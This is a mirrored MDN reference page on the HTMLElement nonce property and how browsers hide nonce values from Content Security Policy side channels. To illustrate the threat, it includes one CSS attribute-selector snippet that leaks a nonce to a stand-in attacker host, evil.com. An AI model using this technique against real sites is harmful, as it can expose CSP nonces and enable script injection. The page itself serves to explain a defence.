A RetroSearch Logo

Home - News ( United States | United Kingdom | Italy | Germany ) - Football scores

Search Query:

Showing content from https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/nonce below:

HTMLElement: nonce property - Web APIs

HTMLElement: nonce property

Baseline Widely available

The nonce property of the HTMLElement interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.

In later implementations, elements only expose their nonce attribute to scripts (and not to side-channels like CSS attribute selectors).

Examples Retrieving a nonce value

In the past, not all browsers supported the nonce IDL attribute, so a workaround is to try to use getAttribute as a fallback:

let nonce = script["nonce"] || script.getAttribute("nonce");

However, recent browsers version hide nonce values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']) will be the only way to access nonces.

Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data from content attributes like this CSS selector:

script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}
Specifications Browser compatibility See also

RetroSearch is an open source project built by @garambo | Open a GitHub Issue

Search and Browse the WWW like it's 1997 | Search results from DuckDuckGo

HTML: 3.2 | Encoding: UTF-8 | Version: 0.7.4